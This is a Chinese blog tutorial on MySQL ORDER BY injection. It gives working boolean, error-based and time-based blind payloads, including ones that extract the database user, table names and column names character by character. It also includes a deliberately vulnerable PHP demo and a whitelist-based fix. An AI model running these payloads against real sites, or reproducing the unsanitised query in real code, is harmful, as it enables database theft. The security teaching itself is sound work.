mysql 数值型注入_MySQL Order By 注入总结

最新推荐文章于 2022-11-06 14:15:19 发布
最新推荐文章于 2022-11-06 14:15:19 发布
阅读量227 收藏
点赞数
文章标签: mysql 数值型注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30069113/article/details/113158480
版权

前言

最近在做一些漏洞盒子后台项目的总结,在盒子众多众测项目中,注入类的漏洞占比一直较大。其中Order By注入型的漏洞也占挺大一部分比例,这类漏洞也是白帽子乐意提交的类型(奖金高、被过滤概览小)。今天给大家分享下一些关于Order By的有趣的经验。

何为order by 注入

本文讨论的内容指可控制的位置在order by子句后,如下order参数可控:select * from goods order by $_GET['order']

注入简单判断

在早期注入大量存在的时候,利用order by子句进行快速猜解表中的列数,再配合union select语句进行回显。在测试时,测试者可以通过修改order参数值,比如调整为较大的整型数,再依据回显情况来判断具体表中包含的列数。

在不知道列名的情况下可以通过列的的序号来指代相应的列。但是经过测试这里无法做运算,如order=3-1 和order=2是不一样的。

08cb71b5856cad8f00b50c3f6e7f102c.png

http://192.168.239.2:81/?order=11 错误

http://192.168.239.2:81/?order=1 正常

进一步构造Payload

前面的判断并不是绝对的,我们需要构造出类似and 1=1、and 1=2的Payload以便于注入出数据。

e642b17c5f627e3b2a1b92fa6a4616d9.png

/?order=IF(1=1,name,price) 通过name字段排序

/?order=IF(1=2,name,price) 通过price字段排序

/?order=(CASE+WHEN+(1=1)+THEN+name+ELSE+price+END) 通过name字段排序

/?order=(CASE+WHEN+(1=2)+THEN+name+ELSE+price+END) 通过price字段排序

/?order=IFNULL(NULL,price) 通过price字段排序

/?order=IFNULL(NULL,name) 通过name字段排序

另外利用rand函数也能达到类似的效果,可以观测到排序的结果不一样

/?order=rand(1=1)

/?order=rand(1=2)

利用报错

在有些情况下无法知道列名,而且也不太直观的去判断两次请求的差别,如下用IF语句为例。

返回多条记录

/?order=IF(1=1,1,(select+1+union+select+2)) 正确

/?order=IF(1=2,1,(select+1+union+select+2)) 错误

/?order=IF(1=1,1,(select+1+from+information_schema.tables)) 正常

/?order=IF(1=2,1,(select+1+from+information_schema.tables)) 错误

利用regexp

/?order=(select+1+regexp+if(1=1,1,0x00)) 正常

/?order=(select+1+regexp+if(1=2,1,0x00)) 错误

利用updatexml

/?order=updatexml(1,if(1=1,1,user()),1) 正确

/?order=updatexml(1,if(1=2,1,user()),1) 错误

利用extractvalue

/?order=extractvalue(1,if(1=1,1,user())) 正确

/?order=extractvalue(1,if(1=2,1,user())) 错误

基于时间的盲注

注意如果直接if(1=2,1,SLEEP(2)),sleep时间将会变成2当前表中记录的数目,还有比如执行BENCHMARK(1000000,100100);等函数,将会对服务器造成一定的拒绝服务攻击。

04dd55a0d387fc314cde265121cbc526.png

/?order=if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) 正常响应时间

/?order=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) sleep 2秒

以猜解user()即root@localhost为例子,由于只能一位一位猜解,可以利用SUBSTR,SUBSTRING,MID,以及left和right可以精准分割出每一位子串。然后就是比较操作了可以利用=,like,regexp等。这里要注意like是不区分大小写。

通过下可以得知user()第一位为r,ascii码的16进制为0x72:

/?order=(select+1+regexp+if(substring(user(),1,1)=0x72,1,0x00)) 正确

/?order=(select+1+regexp+if(substring(user(),1,1)=0x71,1,0x00)) 错误

猜解当前数据库的表名:

/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x67,1,0x00)) 正确

/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x66,1,0x00)) 错误

猜解指定表名中的列名:

/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x69,1,0x00)) 正常

/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x68,1,0x00)) 错误

sqlmap测试

在没有过滤的情况下是能够检测到注入的,如下图:

bfcc78b21c9ba15556d188d762891315.png

附录服务端代码

error_reporting(0);

session_start();

mysql_connect("127.0.0.1", "root", "root") or die("Database connection failed ");

mysql_select_db("sqlidemo") or die("Select database failed");

$order = $_GET['order'] ? $_GET['order'] : 'name';

$sql = "select id,name,price from goods order by $order";

$result = mysql_query($sql);

$reslist = array();

while($row = mysql_fetch_array($result, MYSQL_ASSOC))

{

array_push($reslist, $row);

}

echo json_encode($reslist);

create database sqlidemo;

use sqlidemo;

create table goods (id int(4) not null primary key auto_increment, name char(32) not null, price int(4) not null);

insert into goods (name, price) values("apple", 10);

insert into goods (name, price) values("banana", 15);

insert into goods (name, price) values("peach", 20);

修复建议

这个问题的是由于攻击者通过测试,了解到应用程序对数据对象进行了直接引用。该类问题可以归纳到OWASP-2013中A4(不安全的对象直接引用)。常见的修复方法如下:

通过正则表达式进行字符串过滤。只允许字段中出现字母、数字、下划线。

通过白名单思路,使用间接对象引用。前端传递引用数字或者字符串等,用于与后端做数组映射,这样可以隐藏数据库数据字典效果,避免直接引用带来的危害。

$orderby_whitelist = array(

"apple" => "apple ASC",

"applerev" => "apple DESC",

"daterev" => "banana DESC",

"DEFAULT" => "peach"

);

$order = isset($_GET["order"]) ? $_GET["order"] : "DEFAULT";

$order_expr = array_key_exists($order, $orderby_whitelist) ? $orderby_whitelist[$order] : $orderby_whitelist["DEFAULT"];

mysql_query("SELECT ... FROM ... ORDER BY $order_expr");

参考资料

cici xiang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql order by注入_sql注入order by注入
weixin_28882177的博客
01-19 4732
0x00 前言夜里看了一篇文章,突然有了启发,赶紧记录一下。了解order by参考:order by是mysql中对查询数据进行排序的方法, 使用示例select * from 表名 order by 列名(或者数字) asc;升序(默认升序)select * from 表名 order by 列名(或者数字) desc;降序这里的重点在于order by后既可以填列名或者是一个数字。举个例子:...
Order by注入
qq_40710190的博客
07-01 4132
MySQL order by注入
mysql oder by 注入_orderby 注入
weixin_42298415的博客
01-27 762
0x01 介绍顾名思义,注入点出现在oder by后面即可称为order by 注入正常的oder by 语句:select * from users order by id desc;当desc此处位置参数可控时,即有可能存在oreder by注入,那么如何在这样的情况下注出我们想要的数据呢?1.如果有报错信息输出,可尝试通过报错注入完成sql注入攻击2.如果没有回显,可尝试盲注的手法来注入0x...
mysql oder by 注入_Mysql Order By注入总结
weixin_34877373的博客
01-19 133
何为order by 注入本文讨论的内容指可控制的位置在order by子句后,如下order参数可控"select * from goods order by $_GET['order']"简单注入判断在早期注入大量存在的时候利用order by子句进行快速猜解列数,再配合union select语句进行回显。可以通过修改order参数为较大的整数看回显情况来判断。在不知道列名的情况下可以通过列...
MySQL Order By索引优化方法
09-11
在一些情况下,MySQL可以直接使用索引来满足一个 ORDER BY 或 GROUP BY 子句而无需做额外的排序
mysqlorder by与group by的区别
09-10
以下是对mysqlorder by与group by的区别进行了详细的分析介绍,需要的朋友可以过来参考下
MySQL ORDER BY 的实现分析
09-11
总的来说,在 MySQL 中的ORDER BY有两种排序实现方式,一种是利用有序索引获取有序数据,另一种则是通过相应的排序算法,将取得的数据在内存中进行排序
MySQL Order By用法分享
09-11
本文用实例一点一点告诉你,MySQL order by的用法
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
mysql oder by 注入_Order by排序注入方法小总结
weixin_28753647的博客
02-07 1019
今天总结一下注入点在order by排序注入,学习一下记录下这个过程声明:此文谨供学习记录研究使用,切勿用于非法用途,否则后果自负!注入方法介绍当页面出现mysql报错信息时,注入点在 order by后面,此时可以利用报错信息进行注入。正常语句mysql> select * from users order by id;+----+----------+------------+| id ...
mysql oder by 注入_mysqlorder by注入
weixin_42261068的博客
01-27 93
最近在做一些漏洞盒子后台项目的总结,在盒子众多众测项目中,注入类的漏洞占比一直较大。其中Order By注入的漏洞也占挺大一部分比例,这类漏洞也是白帽子乐意提交的类(奖金高、被过滤概览小)。今天给大家分享下一些关于Order By的有趣的经验。何为order by 注入本文讨论的内容指可控制的位置在order by子句后,如下order参数可控:select * from goods orde...
mysql order by注入_玩得一手好注入order by排序篇
weixin_42319865的博客
01-19 342
0x00 背景看了之前Gr36_前辈在先知上的议题,其中有提到排序注入,这个在最近经常遇到这样的问题,所以先总结order by 排序注入的知识。0x01 环境信息测试环境:操作系统ubuntu0.14.04.1 MYSQL:5.5.55-0测试代码:$mysql_server="10.10.10.136";$mysql_username="root";$mysql_userpass="xxxx...
order by 注入
硫酸超的博客
08-07 2415
order by 注入前言直接添加注入语句利用一些函数利用 andorderby stacked injection 前言 尝试?sort=1 desc 或者 asc,显示结果不同,则表明可以注入。(升序 or 降序排列) 从上述的 sql 语句中我们可以看出,我们的注入点在 order by 后面的参数中,而 order by 不同于的我们在 where 后的注入点,不能使用 union 等进行注入。 如果order by '1’显示的是默认排序 直接添加注入语句 ?sort=(select ******
order by注入
坚持硬核
01-29 463
0x00 一些事实 order by 2 并不等于 order by (1+1) 或者order by 1+1 order by x+y 或者order by (x+y) 的结果与不加order by的结果是相同的 位运算符 order by的语法再研究: 使用ORDER BY子句对查询返回的结果按一列或多列排序。 ORDER BY子句的语法格式为: ORDER BY {列名 [ASC|DESC]} [,...n] ORDER BY 语句默认按照升序对记录进行排序。 例如: or
order by name 注入
aiquan9342的博客
10-02 209
order by name idid是一个注入点可以利用if语句进行注入 order by name ,if(1=1,1,select 1 from information_schema.tables) 如果为假则执行第二条语句,要么报错要么没有返回值。这属于盲注的一种。 转载于:https://www.cnblogs.com/xishaonian/p/7618376.html...
SQL注入进阶-order by注入
AkangBoy的博客
11-06 8347
本文从order by原理简介开始,详细描述了order by注入原理以及多种注入姿势,包含order by union select注入order by if()注入order by sleep()注入order by报错注入
order by注入,limit注入,宽字节注入
qq_31088019的博客
08-09 1256
order by注入,limit注入,宽字节注入
mysql order by select_mysql order by 对select查询结果集排序
最新发布
06-09
是的,MySQLORDER BY子句可以用于对SELECT查询结果集进行排序。您可以使用该子句指定一个或多个列作为排序键,并指定升序或降序排序。例如: ``` SELECT * FROM mytable ORDER BY column1 ASC, column2 DESC; ```...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值